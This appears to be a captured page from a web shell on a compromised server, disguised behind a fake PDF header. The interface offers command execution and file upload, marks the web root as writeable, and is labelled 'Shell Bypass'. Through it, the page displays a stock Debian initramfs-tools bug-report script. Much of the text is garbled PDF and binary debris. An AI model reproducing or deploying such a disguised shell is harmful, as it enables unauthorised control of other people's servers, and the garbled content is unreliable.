%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/bug/initramfs-tools/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/bug/initramfs-tools/script
#!/bin/sh

exec >&3

echo "-- initramfs sizes"
ls -lh /boot/initrd.img-*

echo "-- /proc/cmdline"
cat /proc/cmdline
echo

if [ -r  /etc/initramfs-tools/conf.d/resume ]; then
	echo "-- resume"
	cat  /etc/initramfs-tools/conf.d/resume
fi

echo "-- /proc/filesystems"
grep -v nodev /proc/filesystems
echo

echo "-- lsmod"
lsmod
echo

if [ -r /etc/initramfs-tools/modules ]; then
	echo "-- /etc/initramfs-tools/modules"
	sed 's/#.*$//;/^[[:space:]]*$/d' /etc/initramfs-tools/modules
	echo
fi

if [ -r /etc/kernel-img.conf ]; then
	echo "-- /etc/kernel-img.conf"
	cat /etc/kernel-img.conf
	echo
fi

if [ -r /etc/initramfs-tools/initramfs.conf ]; then
	echo "-- /etc/initramfs-tools/initramfs.conf"
	sed 's/#.*$//;/^[[:space:]]*$/d' /etc/initramfs-tools/initramfs.conf
	echo
fi

if [ -r /etc/initramfs-tools/update-initramfs.conf ]; then
	echo "-- /etc/initramfs-tools/update-initramfs.conf"
	sed 's/#.*$//;/^[[:space:]]*$/d' /etc/initramfs-tools/update-initramfs.conf
	echo
fi

if [ -r /etc/crypttab ]; then
	echo "-- /etc/crypttab"
	cat /etc/crypttab
	echo
fi

if [ -r /proc/mdstat ]; then
	echo "-- /proc/mdstat"
	cat /proc/mdstat
	echo
fi

if grep -rq "MODULES=dep" /etc/initramfs-tools/ ; then
	echo "-- /sys/block"
	ls /sys/block
	echo
fi

echo "-- mkinitramfs hooks"
ls /usr/share/initramfs-tools/hooks /etc/initramfs-tools/hooks/
echo

Kontol Shell Bypass